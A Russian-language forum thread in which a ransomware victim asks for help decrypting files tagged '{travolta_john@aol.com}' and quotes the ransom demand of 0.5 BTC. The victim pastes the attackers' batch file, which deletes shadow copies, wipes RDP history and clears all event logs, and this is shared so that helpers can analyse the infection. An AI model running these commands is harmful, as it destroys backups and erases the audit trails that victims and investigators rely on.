Перейти к содержанию

Шифровальшик {travolta_john@aol.com}

Artem Parfenenko
 Share

Рекомендуемые сообщения

Artem Parfenenko Новичок

Artem Parfenenko

Опубликовано
Опубликовано

Здравствуйте

 

Зашифровали все рабочие данные.
с добавлением к имени "{travolta_john@aol.com}"
Во всех папках прилагался файл:

how_to_back_files.html

 

проверили с помошью

Выявлены следующие результаты:
https://ibb.co/gkS4L0

https://ibb.co/dEmBYL

bat файл содержил следующую информацию:

 

@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp 
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
 
Логи в файле:
CollectionLog-2018.10.31-12.07.zip

 

Спасибо, очень ждем Вашей помощи.

 
 

how_to_back_files.html

CollectionLog-2018.10.31-12.07.zip

Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Здравствуйте!

 

Автологер разве не предупредил вас, что запущен из терминальной сессии, а надо из консоли?

По возможности, переделайте.

 

+ пару зашифрованных документов в архиве прикрепите к следующему сообщению.

Ссылка на комментарий
Поделиться на другие сайты
Artem Parfenenko Новичок

Artem Parfenenko

Опубликовано
  • Автор
Опубликовано

К сожалению проделать выгрузку логов не из терминала, нет возможности.
Файлы для примера в Архиве "Примеры.rar".

 

Примеры.rar

Ссылка на комментарий
Поделиться на другие сайты
Artem Parfenenko Новичок

Artem Parfenenko

Опубликовано
  • Автор
Опубликовано

Переписка с злоумышленником:

1 ID = 0.5 BTC 
For decrypt need pay 0.5 BTC 
You can send me one file for test. 
File only picture or text. No database, no backup. 
Only we can decrypt your data.
 
 
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • Синтезит
      ШИФРОВАЛЬШИК datastore@cyberfear.com
      От Синтезит
      Здравствуйте, помогите пожалуйста расшифровать.
      Ссылка на зашифрованные файлы от платформы 1с
      https://dropmefiles.com/8aGW7 пароль 0uJxTd
       
      Чистые файлы из архива Windows
      https://dropmefiles.com/PzSaC пароль ecUlCq
      Addition.txt FRST.txt
    • RusLine
      Помогите нарвался на шифровальшика.
      От RusLine
      Здравствуйте помогите чем сможете. Скачал с nnmclub total commander попользовался а утром зашифровало все фото файлы важные. Подскажите что делать ?
        



    • R3DSTALK3R
      ШИФРОВАЛЬШИК datastore@cyberfear.com
      От R3DSTALK3R
      Наш компьютер, где был установлен сервер 1C, заразился вирусом шифровальщиком-вымогателем. Первое что сделал вирус – сменил пароль для учётной записи администратора. Так же он зашифровал все файлы ключом ThnzSOMKAAKZ7v7OV4MX-cwAzeoX0aWrzJmrPnXwamk*datastore@cyberfear.com-ThnzSOMKAAKZ7v7OV4MX-cwAzeoX0aWrzJmrPnXwamk (как сказано в послании от вымогателя), которые больше 8,5 мб.
      Очень надеемся, что сможете помочь решить нашу проблему.
      https://dropmefiles.com/DUXr9 ссылка на шифрованные файлы
      Addition.txt Shortcut.txt FRST.txt README.txt
    • Timur Swimmer
      ШИФРОВАЛЬШИК datastore@cyberfear.com
      От Timur Swimmer
      Здравствуйте.
      Наш компьютер, где был установлен сервер 1C, заразился вирусом шифровальщиком-вымогателем. Первое что сделал вирус – сменил пароль для учётной записи администратора. Так же он зашифровал все файлы ключом RSA4096 (как сказано в послании от вымогателя), которые больше 8,5 мб. У всех файлов больше 8,5 мб изменили расширение на datastore@cyberfear.com-WuqqAQ9reBWcAtfXZgxTUsAfCnUmDrqmJgKmH-4JJ0g .
      По ссылке можно скачать несколько зашифрованных файлов для примера, в папке Original файлы, как они выглядели до шифрования и письмо от мошенников.
      ссылка на диск
      Очень надеемся, что сможете помочь решить нашу проблему.
    • Samoxval
      Поймали шифровальшика файлы с расширением .nigra
      От Samoxval
      Поймали шифровальщик. Расширение .nigra
      Скорее всего по рдп, сам вирус не нашли.
      Установили новый диск и на него накатили чистую виндовс, старые 2 диска осталис подключены как второстепенные, систему на них не трогали.
      Если есть возможность нам спасти файлы (несколько из них приложил) за месяц. Тоесть это файлы кассовой смены 1 файл= 1 кассовая смена. Более нам ничего не требуется с этих дисков. Либо база sql там эти все смены хранятся.
      Зашифрованые файлы.rar
      Первоначальное расширение файлов .udb
       
×
×
  • Создать...